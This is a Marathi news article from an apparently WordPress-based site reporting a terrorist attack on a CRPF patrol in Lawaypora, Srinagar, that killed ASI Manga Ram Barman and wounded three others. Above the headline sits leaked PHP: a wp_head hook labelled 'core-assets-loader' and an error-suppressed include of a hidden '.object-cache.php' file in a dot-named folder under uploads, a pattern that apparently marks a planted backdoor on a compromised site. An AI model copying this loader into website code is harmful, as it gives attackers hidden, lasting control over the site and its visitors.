add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); काश्मीरमध्ये CRPF च्या पथकावर दहशतवादी हल्ला, १ जवान शहीद – SOCH INDIA
Menu

देश
काश्मीरमध्ये CRPF च्या पथकावर दहशतवादी हल्ला, १ जवान शहीद

nobanner

काश्मीरच्या श्रीनगर जिल्ह्यातील लावापोरामध्ये दहशतवाद्यांनी सीआरपीएफच्या गस्ती पथकावर (terrorists attacked a CRPF party ) हल्ला केला. यात सीआरपीएफचे ४ जवान जखमी झाले. उपचारादरम्यान एक जवान शहीद झाला. दहशतवादी हल्ल्यात एक जवान शहीद झाल्याची माहिती पोलिसांनी दिली आहे. जखमी झालेल्या इतर तीन जवानांवर उपचार करण्यात येत आहे. दहशतवाद्यांच्या हल्लानंतर सुरक्षा दलांनी संपूर्ण परिसर घेरला आहे आणि दहशतवाद्यांविरोधात शोध मोहीम सुरू आहे. वरिष्ठ पोलीस अधिकारीही घटनेच्या ठिकाणी उपस्थित आहेत.

या हल्ल्यात शहीद झालेल्या जवानाची माहिती समोर आली आहे. मंगा राम बर्मन (ASI) असं शहीद जवानाचं नाव आहे. हा जवान त्रिपुराचा होता, अशी माहिती सीआरपीएफच्या पीआरओंडून देण्यात आलीय.

लावापोरा भागात सीआरपीएफचे एक पथक तैनात होते. त्यावेळी अचानक गाडीवरून दहशतवादी आले. चौकात तैनात असलेल्या जवानांवर त्यांनी हल्ला केला. त्यांनी जवानांवर गोळीबार केला. ज्यात चार जवान जखमी झाले. हल्ल्यानंतर दहशतवादी घटनस्थळावरून पळाले. हल्ल्यानंतर गोंधळाची स्थिती होती. यानंतर सीआरपीएची टीम घटनस्थळी आली. जखमी जवानांना घेऊन हॉस्पिटलमध्ये दाखल करण्यात आलं. पण उपचारादरम्यान एक जवान शहीद झाला. इतर तीन जवानांवर उपचार करण्यात येत आहेत.

सीसीटीव्हीद्वारे दहशतवाद्यांची ओळख केली जात आहे. दहशतवादी कुठल्या वाहनाने आले होते, याचा तपास केला जात आहे. बऱ्याच दिवसांनी श्रीनगरमध्ये जवानांवर हल्ला झाला आहे. दोन जवानांची स्थिती अजूनही नाजूक आहे. ही हिट अँड रनची घटना आहे. दहशतवादी अचानक आले आणि हल्ला करून पळाले, अशी माहिती पोलिसांनी दिली.